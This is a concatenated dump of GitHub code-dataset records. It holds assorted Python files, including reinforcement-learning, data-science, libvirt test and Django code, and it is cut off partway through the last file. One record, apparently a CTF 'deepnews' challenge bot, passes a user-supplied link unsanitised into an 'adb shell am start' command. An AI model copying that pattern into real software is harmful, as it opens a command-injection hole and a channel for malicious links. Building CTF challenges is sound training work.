\"\"\"\n# select date_, happiness\n# from happiness\n# where date_ <= %(last_date)s\n# order by date_ desc limit %(last_days)s;\n# \"\"\", {\n# 'last_date': last_date,\n# 'last_days': last_days\n# })\n# answer = cur.fetchall()\n# answer.reverse()\n# answer = [[a[0], a[1]] for a in answer]\n# df = pd.DataFrame(data=answer, columns=['base_date', 'happiness'])\n# df.set_index('base_date', inplace=True)\n# return df\n\ndef download_happiness(start_date, records):\n \"\"\"\n Download happiness records from the url below. Happiness records are stored\n into happiness database table.\n\n Parameters\n ----------\n start_date : datetime.pyi\n Initial downloading base_date.\n records : int\n Maximum number of records after start_date to download.\n \"\"\"\n\n LOGGER.debug(\"Downloading happiness time series.\")\n data_json = requests.get(\n 'https://hedonometer.org/api/v1/happiness/?format=json×eries__'\n f'title=en_all&date__gte='\n f'{start_date.strftime(\"%Y-%m-%d\")}&limit={records}')\n data = data_json.json()\n data = [[\n datetime.datetime.strptime(d['date'], \"%Y-%m-%d\"), d['frequency'],\n float(d['happiness'])\n ] for d in data['objects']]\n # conn = psycopg2.connect(\"dbname=%s user=fsagols host=localhost\" %\n # TIMESERIES_DATABASE)\n LOGGER.info(\"Storing happiness time series.\")\n # cur = conn.cursor()\n # cur.executemany(\n # \"\"\"\n # insert into happiness\n # values (%s, %s, %s)\n # on conflict (date_)\n # do nothing;\n # \"\"\", data)\n # conn.commit()\n # conn.close()\n data = sorted(data, key=lambda a: a[0])\n\n with open(\"data.csv\", \"w\", newline=\"\") as archivo:\n archivo_writer = csv.writer(archivo, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n archivo_writer.writerow(['date', 'frequency', 'happiness'])\n for elemento in data:\n archivo_writer.writerow(elemento)\n archivo.close()\n\n\ndef retrieve_happiness(intervalo_fechas):\n \"\"\"\n Selecciona los valores de felicidad en fechas determinadas\n :param intervalo_fechas: lista en forma similar a los \"Index slices\".\n \"\"\"\n for intervalo in intervalo_fechas:\n fecha_ini = datetime.datetime.strptime(intervalo[0], \"%Y-%m-%d\")\n\n if len(intervalo) > 1:\n fecha_ter = datetime.datetime.strptime(intervalo[1], \"%Y-%m-%d\")\n else:\n fecha_ter = fecha_ini\n\n if len(intervalo) > 2:\n salto = intervalo[2]\n else:\n salto = 1\n\n contador = salto\n with open(\"data.csv\", \"r\") as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',')\n print(f'\\t Intervalo de fechas: {intervalo}.')\n for row in csv_reader:\n if fecha_ini <= \\\n datetime.datetime.strptime(row['date'], '%Y-%m-%d %H:%M:%S') <= \\\n fecha_ter:\n if contador == salto:\n print(f'\\t date: {row[\"date\"]}, frequency: {row[\"frequency\"]},'\n f' happiness: {row[\"happiness\"]}')\n contador = 0\n contador += 1\n\n\nif __name__ == \"__main__\":\n LOGGER = loggers.define_logger(\"happiness.log\")\n date = datetime.datetime(2022, 1, 1)\n download_happiness(date, 5000)\n\nretrieve_happiness([['2022-01-01', '2022-05-24', 3], ['2022-02-01', '2022-02-07']])\n# retrieve_happiness([['2022-01-01', '2022-03-27', 6],\n# ['2022-02-01', '2022-02-07', 2], ['2022-04-01']])\n","repo_name":"German-Jordi/Programacion_Avanzada","sub_path":"Tarea_12_German_Jordi_Arreortua.py","file_name":"Tarea_12_German_Jordi_Arreortua.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37614626920","text":"# Vanilla policy gradient (VPG) using Pytorch, continuous action space\n# VPG Algorithm can be found in https://spinningup.openai.com/en/latest/algorithms/vpg.html, http://joschu.net/docs/thesis.pdf\n# Intrinsic Curiosity Module (ICM): https://arxiv.org/abs/1705.05363\n# MountainCarContinuous-v0 in Gym environment\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndevice = torch.device(\"cpu\")\n\n# policy network - gaussian mean and std (output=2)\n# gaussian mean (output=1)\nclass policy_network(nn.Module):\n def __init__(self, input=4, hidden=64, output=2):\n super(policy_network, self).__init__()\n self.fc1 = nn.Linear(input, hidden)\n self.fc2 = nn.Linear(hidden, hidden)\n self.fc3 = nn.Linear(hidden, output)\n\n def forward(self, input):\n x = F.relu(self.fc1(input))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n# state-value estimator (critic)\nclass state_value_network(nn.Module):\n def __init__(self, input=4, hidden=64, output=1):\n super(state_value_network, self).__init__()\n self.fc1 = nn.Linear(input, hidden)\n self.fc2 = nn.Linear(hidden, hidden)\n self.fc3 = nn.Linear(hidden, output)\n\n def forward(self, input):\n x = F.relu(self.fc1(input))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n# forward dynamics model - s_{t+1} = f(s_t, a_t)\nclass forward_dynamics_network(nn.Module):\n def __init__(self, input=5, hidden=64, output=4):\n super(forward_dynamics_network, self).__init__()\n self.fc1 = nn.Linear(input, hidden)\n self.fc2 = nn.Linear(hidden, hidden)\n self.fc3 = nn.Linear(hidden, output)\n\n def forward(self, input):\n x = F.relu(self.fc1(input))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\ndef choose_action(ob):\n # choose action using current policy pi (continuous action space)\n # assume the variance of Gaussian policy \\sigma = 1.0\n mean_a = pi(torch.tensor(ob, dtype=torch.float32).to(device)).detach()\n mean_a = mean_a.cpu().numpy()\n a = np.random.normal(loc=mean_a, scale=1.0)\n # if a < 0:\n # a_env = 0\n # else:\n # a_env = 1\n return np.array(a)\n\ndef compute_advantage(rewards, states, gamma):\n # get returns of states from a trajectory\n # R_t = r_t + gamma * r_{t+1} + gamma^2 * r_{t+2} + ...\n returns = rewards.copy()\n advs = rewards.copy()\n states_ep = states.copy()[-len(rewards):]\n for i in reversed(range(len(returns)-1)):\n r = returns[i] + gamma * returns[i+1]\n returns[i] = r\n states_ep = torch.tensor(states_ep, dtype=torch.float32).to(device)\n returns = torch.tensor(returns, dtype=torch.float32).to(device)\n advs = returns - V(states_ep).squeeze(1)\n # advs = returns\n return advs\n\ndef compute_epsilon_adv(states, epsilon):\n # get another adv according to the discrepancy of current state to its average\n states_o = states.copy()\n states = np.array(states)\n means = []\n advs = []\n for i in range(len(states[0])):\n mean_ = np.mean(states[:,i])\n means.append(mean_)\n for i in range(len(states_o)):\n a = states_o[i]\n e = a - means\n cur_error = sum(t*t for t in e)\n advs.append(cur_error)\n if np.random.uniform() < epsilon:\n value = [t * 100 for t in advs]\n else:\n value = [t/t for t in advs]\n return value\n\ndef intrinsic_r(ob, a, ob_):\n # calculated the intrinsic reward as prediction error\n loss = nn.MSELoss(reduction='sum').to(device)\n input_tensor = torch.tensor(np.concatenate((ob, a)), dtype=torch.float32).to(device)\n ob_tensor = torch.tensor(ob, dtype=torch.float32).to(device)\n ob_p = forward_net(input_tensor).detach()\n pred_error = loss(ob_p, ob_tensor)\n return pred_error.item() # as a number\n \ndef model_validate():\n ep_reward = 0\n ob = env.reset()\n done = False\n while not done:\n env.render() \n a = choose_action(ob)\n ob_, r, done, _ = env.step(a)\n ep_reward += r\n ob = ob_\n return ep_reward\n\nK = 10000\nBATCH_SIZE = 500\nGAMMA = 0.95\nETA = 0.9 # regularizer of loss function\nLEARNING_RATE = 0.0005\ndecay = 0.995\n\nenv = gym.make('MountainCarContinuous-v0')\n\nn_actions = env.action_space.shape[0]\n# n_actions = 1\nstate_length = env.observation_space.shape[0]\n\n# initialize policy network, forward dynamics network and state-value network\npi = policy_network(input=state_length, output=1).to(device)\n# forward_net = forward_dynamics_network(input=(n_actions+state_length), output=state_length).to(device)\nV = state_value_network(input=state_length).to(device)\n\n# define optimizers\n# params = list(pi.parameters()) + list(forward_net.parameters())\n# global_optimizer = torch.optim.Adam(params, lr=LEARNING_RATE)\nV_optimizer = torch.optim.Adam(V.parameters(), lr=LEARNING_RATE)\npi_optimizer = torch.optim.Adam(pi.parameters(), lr=LEARNING_RATE)\n# forward_net_optimizer = torch.optim.Adam(forward_net.parameters(), lr=LEARNING_RATE)\n\n# define loss\nloss_MSE = nn.MSELoss(reduction='mean').to(device)\n\ntraining_rewards = []\n\n# epsilon = 1.0\nepsilon = 0.0\n\nfor k in range(K):\n # save trajectories\n states = []\n actions = []\n states_ = []\n advantages = torch.tensor([], dtype=torch.float32).to(device)\n # collect trajectories\n ob = env.reset()\n done = False\n rewards = [] \n step_e = 0 # allowed steps in one episode\n total_r = 0 \n while not done:\n a = choose_action(ob)\n ob_, r_e, done, _ = env.step(a)\n # r_i = intrinsic_r(ob, a, ob_) #add intrinsic reward\n # r = r_i + r_e\n r = r_e\n # save trajectories\n states.append(ob)\n actions.append(a)\n rewards.append(r)\n states_.append(ob_)\n ob = ob_\n step_e += 1\n total_r += r_e\n # calculate discounted return and advantages\n advs = compute_advantage(rewards, states, GAMMA)\n advantages = torch.cat((advantages, advs), 0)\n\n adv_epsilon = compute_epsilon_adv(states, epsilon)\n adv_epsilon = torch.tensor(adv_epsilon, dtype=torch.float32).to(device)\n advantages = torch.mul(advantages, adv_epsilon)\n # epsilon = np.max((epsilon*decay, 0.0001))\n\n states = torch.tensor(states, dtype=torch.float32).to(device)\n actions = torch.tensor(actions, dtype=torch.float32).to(device)\n states_actions = torch.cat((states, actions), 1).to(device)\n states_ = torch.tensor(states_, dtype=torch.float32).to(device)\n # update policy pi and forward dynamics model\n # global_optimizer.zero_grad() \n # log_pi = - (((actions - pi(states)))**2) / 2\n # pi_loss = - torch.sum(torch.mul(log_pi.squeeze(), advantages)) # negative: .backward() use gradient descent, (-loss) with gradient descnet = gradient ascent\n # forward_net_loss = loss_MSE(states_, forward_net(states_actions))\n # global_loss = (1-ETA) * pi_loss + ETA * forward_net_loss\n # global_loss.backward(retain_graph=True)\n # global_optimizer.step()\n #\n pi_optimizer.zero_grad() \n log_pi = - (((actions - pi(states)))**2) / 2\n pi_loss = - torch.sum(torch.mul(log_pi.squeeze(), advantages)) # negative: .backward() use gradient descent, (-loss) with gradient descnet = gradient ascent\n pi_loss.backward(retain_graph=True)\n pi_optimizer.step()\n\n V_optimizer.zero_grad() # clear gradient\n v_loss = loss_MSE(advantages, V(states).squeeze())\n v_loss.backward()\n V_optimizer.step()\n\n # validate current policy\n if k % 50 == 0:\n # if k % 500 == 0:\n # training_reward = model_validate()\n # training_rewards.append(training_reward)\n # print('Step: ', k, ' Total reward (model validation): ', training_reward)\n print('Step: ', k, ' Total reward: ', total_r, 'epsilon', epsilon)\n # re-fit state-value network (critic)\n\n training_rewards.append(total_r)\n\n# plt.plot(smooth_reward(ep_rewards, 50))\nplt.plot(training_rewards)\nplt.show()\n\nep_rewards = []\nfor ii in range(10):\n ep_reward = model_validate()\n ep_rewards.append(ep_reward)\nprint('Average rewards of last 10 eps: ', np.mean(ep_rewards))\n# Vanilla policy gradient using Pytorch, continuous action space\n","repo_name":"Wang-Xiaoyang/RL-Implementations","sub_path":"2_vanilla_policy_gradient/idea_trial_backup.py","file_name":"idea_trial_backup.py","file_ext":"py","file_size_in_byte":8367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"14401968629","text":"import random\nfrom mullermsm import muller\nmullerforce = muller.muller_force()\nimport scipy.linalg\nfrom matplotlib.pyplot import *\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument('--dt', dest='dt', type=float, default=0.1)\nparser.add_argument('-n', dest='num_frames', type=int, default=100000)\nparser.add_argument('-o', dest='output', default='pos.npy')\n\nargs = parser.parse_args()\n\nkT = 15.0\ndt = args.dt\nmGamma = 1000.0\ntraj_length = args.num_frames \ninitial_x = [random.uniform(-1.5, 1.2), random.uniform(-0.2, 2)]\npositions = muller.propagate(traj_length, initial_x, kT, dt, mGamma, mullerforce)\n\nnp.save(args.output, positions)\n","repo_name":"rmcgibbo/opt-k","sub_path":"muller/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"74027730459","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sklearn.datasets\n\n\ndef bunch_to_df(bunch):\n df = pd.DataFrame(bunch.data, columns=bunch.feature_names)\n df['target'] = pd.Series(bunch.target)\n return df\n\ndef visualize_df(df):\n pd.plotting.scatter_matrix(df, c=pd.Categorical(df['target']), marker='o')\n plt.show()\n\n\niris = sklearn.datasets.load_iris()\niris_df = bunch_to_df(iris)\n\nprint(iris_df.head())\nprint(iris_df.describe())\n\nvisualize_df(iris_df)\n","repo_name":"fpecek/machine-learning-algorithms","sub_path":"part2/iris_explore.py","file_name":"iris_explore.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30435651759","text":"\"\"\"\nTest libvirt support features in qemu cmdline.\nBTW it not limited to hypervisors CPU/machine features.\n\"\"\"\nimport re\nimport logging as log\nimport platform\n\nfrom virttest import virsh\nfrom virttest.libvirt_xml import vm_xml\nfrom virttest.utils_test import libvirt\n\nfrom virttest import libvirt_version\n\nfrom avocado.utils import process, astring\n\n\n# Using as lower capital is not the best way to do, but this is just a\n# workaround to avoid changing the entire file.\nlogging = log.getLogger('avocado.' + __name__)\n\n\ndef config_feature_pv_eoi(test, vmxml, **kwargs):\n \"\"\"\n Config libvirt VM XML to enable/disable PV EOI feature.\n\n :param vmxml: VMXML instance\n :param kwargs: Function keywords\n :return: Corresponding feature flag in qem cmdline\n \"\"\"\n # This attribute supported since 0.10.2 (QEMU only)\n if not libvirt_version.version_compare(0, 10, 2):\n test.cancel(\"PV eoi is not supported in current\"\n \" libvirt version\")\n qemu_flags = []\n eoi_enable = kwargs.get('eoi_enable', 'on')\n get_hostos_version = astring.to_text(process.run(\"cat /etc/redhat-release\", shell=True).stdout)\n if re.search(r'(\\d+(\\.\\d+)?)', get_hostos_version) is not None:\n hostos_version = float(re.search(r'(\\d+(\\.\\d+)?)', get_hostos_version).group(0))\n if hostos_version < float(8.1):\n if eoi_enable == 'on':\n qemu_flags.append('+kvm_pv_eoi')\n elif eoi_enable == 'off':\n qemu_flags.append('-kvm_pv_eoi')\n else:\n logging.error(\"Invalid value %s, eoi_enable must be 'on' or 'off'\", eoi_enable)\n elif hostos_version > float(8.0):\n if eoi_enable == 'on':\n qemu_flags.append('kvm-pv-eoi=on')\n elif eoi_enable == 'off':\n qemu_flags.append('kvm-pv-eoi=off')\n else:\n logging.error(\"Invalid value %s, eoi_enable must be 'on' or 'off'\", eoi_enable)\n else:\n test.fail(\"Can not decide the expected qemu cmd line because of no expected hostos version\")\n\n # Create features tag if not existed\n if not vmxml.xmltreefile.find('features'):\n vmxml.features = vm_xml.VMFeaturesXML()\n vmxml_feature = vmxml.features\n if vmxml_feature.has_feature('apic'):\n vmxml_feature.remove_feature('apic')\n vmxml_feature.add_feature('apic', 'eoi', eoi_enable)\n vmxml.features = vmxml_feature\n logging.debug(\"Update VM XML:\\n%s\", vmxml)\n expect_fail = False if 'expect_define_vm_fail' not in kwargs \\\n else kwargs['expect_define_vm_fail']\n result = virsh.define(vmxml.xml, debug=True)\n libvirt.check_exit_status(result, expect_fail)\n if expect_fail:\n libvirt.check_result(result, kwargs.get('expected_msg'))\n return\n return qemu_flags\n\n\ndef config_feature_memory_backing(test, vmxml, **kwargs):\n \"\"\"\n Config libvirt VM XML to influence how virtual memory pages are backed\n by host pages.\n\n :param vmxml: VMXML instance\n :param kwargs: Function keywords\n :return: Corresponding feature flag in qem cmdline\n \"\"\"\n # Both 'nosharepages' and 'locked' are supported since 1.0.6\n if not libvirt_version.version_compare(1, 0, 6):\n test.cancel(\"Element is not supported in current\"\n \" libvirt version\")\n qemu_flags = []\n no_sharepages = \"yes\" == kwargs.get(\"nosharepages\", \"no\")\n locked = \"yes\" == kwargs.get(\"locked\", \"no\")\n if no_sharepages:\n # On RHEL6, the flag is 'redhat-disable-KSM'\n # On RHEL7 & Fedora, the flag is 'mem-merge=off'\n qemu_flags.append(['mem-merge=off', 'redhat-disable-KSM'])\n if locked:\n if not libvirt_version.version_compare(5, 3, 0):\n qemu_flags.append(\"mlock=on\")\n else:\n qemu_flags.append(\"mem-lock=on\")\n memtune_xml = vm_xml.VMMemTuneXML()\n memtune_xml.hard_limit = vmxml.max_mem * 4\n vmxml.memtune = memtune_xml\n vmxml.sync()\n try:\n vm_xml.VMXML.set_memoryBacking_tag(vmxml.vm_name,\n hpgs=False,\n nosp=no_sharepages,\n locked=locked)\n logging.debug(\"xml updated to %s\", vmxml.xmltreefile)\n except Exception as detail:\n logging.error(\"Update VM XML fail: %s\", detail)\n return qemu_flags\n\n\ndef run(test, params, env):\n \"\"\"\n Test libvirt support features in qemu cmdline.\n\n 1) Config test feature in VM XML;\n 2) Try to start VM;\n 3) Check corresponding feature flags in qemu cmdline;\n 4) Login VM to test feature if necessary.\n \"\"\"\n vm_name = params.get(\"main_vm\", \"avocado-vt-vm1\")\n vm = env.get_vm(vm_name)\n expect_fail = \"yes\" == params.get(\"expect_start_vm_fail\", \"no\")\n expect_define_vm_fail = 'yes' == params.get('expect_define_vm_fail', 'no')\n test_feature = params.get(\"test_feature\")\n # All test case Function start with 'test_feature' prefix\n testcase = globals()['config_feature_%s' % test_feature]\n test_feature_attr = params.get(\"test_feature_attr\", '').split(\",\")\n test_feature_valu = params.get(\"test_feature_valu\", '').split(\",\")\n # Parameters for test case\n if len(test_feature_attr) != len(test_feature_valu):\n test.error(\"Attribute number not match with value number\")\n test_dargs = dict(list(zip(test_feature_attr, test_feature_valu)))\n if expect_define_vm_fail:\n test_dargs.update({'expect_define_vm_fail': expect_define_vm_fail,\n 'expected_msg': params.get('expected_msg', '')})\n if vm.is_alive():\n vm.destroy()\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n vmxml_backup = vmxml.copy()\n virsh_dargs = {'debug': True, 'ignore_status': False}\n\n if 'ppc64le' in platform.machine().lower() and test_feature == 'pv_eoi':\n if not libvirt_version.version_compare(6, 0, 0):\n test.cancel('Feature %s is supported since version 6.0.0' % test_feature)\n try:\n # Run test case\n qemu_flags = testcase(test, vmxml, **test_dargs)\n if not qemu_flags and expect_define_vm_fail:\n return\n result = virsh.start(vm_name, **virsh_dargs)\n libvirt.check_exit_status(result, expect_fail)\n\n # Check qemu flag\n vm_pid = vm.get_pid()\n with open(\"/proc/%s/cmdline\" % vm_pid) as cmdline_f:\n cmdline_content = cmdline_f.read()\n logging.debug(\"VM cmdline:\\n%s\",\n cmdline_content.replace('\\x00', ' '))\n msg = \"Find '%s' in qemu cmdline? %s\"\n found_flags = []\n index = 0\n for flag in qemu_flags:\n # Here, flag could be a list, so uniform it to list for next\n # step check. And, check can pass if any element in the list\n # exist in cmdline\n if not isinstance(flag, list):\n flag = [flag]\n found_f = []\n for f in flag:\n if f in cmdline_content:\n found_f.append(True)\n break\n else:\n found_f.append(False)\n found_flags.append(any(found_f))\n logging.info(msg % (flag, found_flags[index]))\n index += 1\n if False in found_flags:\n test.fail(\"Not find all flags\")\n finally:\n vmxml_backup.sync()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/libvirt_qemu_cmdline.py","file_name":"libvirt_qemu_cmdline.py","file_ext":"py","file_size_in_byte":7395,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"14939540799","text":"#!/usr/bin/python3\n\nimport subprocess\n\n\nprint('So did you find anything?\\nyou can send me the link here',flush=True)\n\nlink = input('link: ')\n\nprint('ok, i will click on it',flush=True)\n\nsubprocess.call(\n [\"adb\", \"shell\", f\"am start -a android.intent.action.VIEW -d '{link}' com.alphactf.deepnews\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n)\n","repo_name":"vvxhid/alphaCTF-2022","sub_path":"reverse/deepnews/chall/messenger/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"69"}
+{"seq_id":"19076276722","text":"from marshmallow import post_load\nfrom marshmallow.decorators import post_dump\n\nfrom app.extensions.marshmallow_ext import ma\nfrom app.models.commerce import Commerce\nfrom app.models.user import User\n\n\nclass Commerce_Schema(ma.Schema):\n class Meta:\n fields = (\n \"id\",\n \"id_user\",\n \"trading_name\",\n \"company_name\",\n \"cover_path\",\n \"segment\",\n \"description\",\n \"cell_number\",\n \"email\",\n \"street\",\n \"number\",\n \"complement\",\n \"neighborhood\",\n \"city\",\n \"state\",\n \"zipcode\",\n \"created_at\",\n \"updated_at\",\n )\n\n @post_load\n def make_commerce(self, data, **kwargs):\n return Commerce(**data)\n\n @post_dump(pass_many=True)\n def serialize(self, data, many, **kwargs):\n if type(data) is not dict:\n for commerce in data:\n user = User.query.filter_by(id=commerce[\"id_user\"]).first()\n commerce['user'] = {\n 'name': user.name,\n 'email': user.email\n }\n return data","repo_name":"afonsomedeiros/LogoAliAPI","sub_path":"app/serializer/commerce.py","file_name":"commerce.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19521659901","text":"class Solution:\n def add(self, a: int, b: int) -> int:\n z = 0xffffffff\n a, b = a & z, b & z\n while b != 0:\n a, b = a ^ b, ((a & b) << 1) & z\n if a > 0x7fffffff:\n a = ~(a ^ z)\n return a\n\na, b = -2, 1\nc = Solution()\nprint(c.add(a, b))","repo_name":"zhulf0804/Coding.Python","sub_path":"剑指offer/65_g_h_不用加减乘除做加法.py","file_name":"65_g_h_不用加减乘除做加法.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"380445849","text":"from PIL import Image\nimport random as rd\n\nimgx = 512\nimgy = 512\nimage = Image.new(\"RGB\", (imgx, imgy))\nfor x in range(imgx):\n\tfor y in range(imgy):\n\t\timage.putpixel((x,y),(0,0,0))\nsnakenum = 65\nr= 0\ng = 0\nb = 0\nlol = 0\nglobal turn\nglobal snakey\nturn = 0\n\n\ndef pr():\n\tglobal turn, snakey\n\tturn = snakey\n\nfor x in range(snakenum):\n\tsnakey = 0\n\tr = rd.randrange(255)\n\tg = rd.randrange(255)\n\tb = rd.randrange(255)\n\tsnakex = rd.randrange(imgx)\n\t\n\tfor x in range(3000):\n\t\tif snakey <= 510:\n\t\t\tlol = rd.randrange(10)\n\t\t\tif lol < 2:\n\t\t\t\tif snakex != 0:\n\t\t\t\t\tsnakex -= 1\n\t\t\t\telse:\n\t\t\t\t\tif snakey < imgy:\n\t\t\t\t\t\tsnakey +=1\n\t\t\t\timage.putpixel((snakex, snakey),(r,g,b))\n\t\t\t\tpr()\n\t\t\telif lol > 7:\n\t\t\t\tif snakex != imgx:\n\t\t\t\t\tsnakex += 1\n\t\t\t\telse:\n\t\t\t\t\tif snakey < imgy:\n\t\t\t\t\t\tsnakey += 1\n\t\t\t\timage.putpixel((snakex, snakey),(r,g,b))\n\t\t\t\tpr()\n\t\t\telse:\n\t\t\t\tif snakey < imgy:\n\t\t\t\t\tsnakey += 1\n\t\t\t\timage.putpixel((snakex, snakey),(r,g,b))\n\t\t\t\tpr()\n\nimage.save(\"snake.png\", \"PNG\")","repo_name":"miaalexkatz/CS550","sub_path":"snakes.py","file_name":"snakes.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12370453730","text":"#\n# @lc app=leetcode.cn id=701 lang=python3\n#\n# [701] 二叉搜索树中的插入操作\n# insert-into-a-binary-search-tree\n\n# 给定二叉搜索树(BST)的根节点和要插入树中的值,将值插入二叉搜索树。\n# 返回插入后二叉搜索树的根节点。\n# 保证原始二叉搜索树中不存在新值。\n# 注意,可能存在多种有效的插入方式,只要树在插入后仍保持为二叉搜索树即可。 你可以返回任意有效的结果。\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def insertIntoBST(self, root: TreeNode, val: int) -> TreeNode:\n return self.insertIntoBST1(root, val)\n\n @staticmethod\n def insertIntoBST1(root, val):\n def helper(node):\n if node is None:\n return TreeNode(val)\n if val > node.val:\n node.right = helper(node.right)\n else:\n node.left = helper(node.left)\n return node\n return helper(root)\n\n @staticmethod\n def insertIntoBST2(root, val):\n if root is None:\n return TreeNode(val)\n\n node, parent = root, root\n while node:\n parent = node\n node = parent.left if val < parent.val else parent.right\n \n if val < parent.val:\n parent.left = TreeNode(val)\n elif val > parent.val:\n parent.right = TreeNode(val)\n\n return root\n# @lc code=end\n\n","repo_name":"yekingyan/leetcode","sub_path":"701.二叉搜索树中的插入操作.py","file_name":"701.二叉搜索树中的插入操作.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35528340811","text":"import numpy as np\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n long = min(len(matrix), len(matrix[0]))\n matrix = np.array(matrix).astype('int')\n\n for wid in range(long,0,-1):\n i,j = 0, 0\n for i in range(len(matrix) - wid + 1):\n for j in range(len(matrix[0]) - wid + 1):\n print(i,j,wid)\n if np.sum(matrix[i:i+wid,j:j+wid]) == wid**2:\n return wid**2\n return 0\n \n############################################################################# \n \nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n m = len(matrix)\n n = len(matrix[0])\n cache = [[int(matrix[i][j]) if(i == 0 or j == 0) else 0 for j in range(n)] for i in range(m)]\n \n maxL = 0\n for i in range(m):\n for j in range(n):\n if(matrix[i][j] == '1' and i > 0 and j > 0):\n cache[i][j] = min(cache[i-1][j], cache[i][j-1], cache[i-1][j-1]) + 1\n maxL = max(cache[i][j], maxL)\n \n \n return(maxL**2) \n","repo_name":"KaiaX926/Leetcode","sub_path":"221 Maximal Square.py","file_name":"221 Maximal Square.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70524949659","text":"\"\"\"Classes, functions, and data structures to create \"Builders\" for circuits.\n\"\"\"\n\nfrom functools import partial\nfrom typing import Any, Callable\n\nfrom qcware_transpile.circuits import Circuit\nfrom qcware_transpile.gates import Dialect\nfrom qcware_transpile.instructions import Instruction\n\n\nclass Builder:\n def __init__(self, dialect: Dialect):\n self.dialect = dialect\n self.instructions: list[Instruction] = []\n\n def add_instruction(\n self, gate_name: str, bits: list, parameters: dict, metadata: dict\n ) -> \"Builder\":\n self.instructions.append(\n Instruction(\n gate_def=self.dialect.gate_named(gate_name),\n bit_bindings=bits,\n parameter_bindings=parameters,\n metadata=metadata,\n )\n )\n return self\n\n\ndef create_builder(dialect: Dialect, to_native_func: Callable[[Circuit], Any]):\n \"\"\"\n Creates a builder object, starting from a basically empty class and\n adding functions to \"build\" a circuit from scratch based on the gates\n in the dialect and the parameters involved.\n \"\"\"\n result = Builder(dialect)\n\n def create_method(gate_def):\n def add_this_gate(self: Builder, *args, **kwargs):\n gate_name = gate_def.name\n bits = list(args)\n parameters: dict = kwargs\n metadata: dict = dict()\n self.add_instruction(gate_name, bits, parameters, metadata)\n return self\n\n return add_this_gate\n\n for gate_def in dialect.gate_defs:\n\n # now bind this method to the object instance. It may be better to create\n # a class dynamically and then create members of that class; let's try this\n # first.\n # see https://newbedev.com/adding-a-method-to-an-existing-object-instance\n # for descriptions\n setattr(result, gate_def.name, partial(create_method(gate_def), result))\n\n setattr(\n result,\n \"circuit\",\n partial(\n lambda self: Circuit.from_instructions(\n self.dialect.name, self.instructions\n ),\n result,\n ),\n )\n setattr(\n result,\n \"native_circuit\",\n partial(lambda self: to_native_func(self.circuit()), result),\n )\n\n return result\n","repo_name":"qcware/qcware_transpile","sub_path":"qcware_transpile/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35838207413","text":"from django.shortcuts import render, redirect\nfrom .models import *\nfrom django.contrib import messages\nimport bcrypt\nfrom datetime import date\n\ndef register(request):\n\treturn render(request, 'index.html') \n\ndef createuser(request):\n\tprint(request.POST)\n\terrors = User.objects.userValidator(request.POST)\n\tif len(errors) > 0:\n\t\tfor key, value in errors.items():\n\t\t\tmessages.error(request, value)\n\t\treturn redirect('/')\n\telse:\n\t\thashedpassword = bcrypt.hashpw(request.POST ['pw'].encode(), bcrypt.gensalt()).decode()\n\t\tnewuser = User.objects.create(firstName = request.POST['fname'], lastName = request.POST ['lname'], email = request.POST['useremail'], password = hashedpassword )\n\t\tprint (newuser.id)\n\t\trequest.session['loggedInID'] = newuser.id\n\treturn redirect('/book')\n\ndef book(request):\n\tif 'loggedInID' not in request.session:\n\t\treturn redirect('/')\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tcontext = {\n\t\t'loggedUser': loggedInUser,\n\t\t'allbooks': Book.objects.all()\n\t}\n\treturn render (request, 'book.html', context)\t\n\ndef login(request):\n\tvalidationErrors = User.objects.loginValidator(request.POST)\n\tif len(validationErrors) > 0:\n\t\tfor key, value in validationErrors.items():\n\t\t\tmessages.error(request, value)\n\t\treturn redirect('/')\n\tloggedInUser = User.objects.get(email = 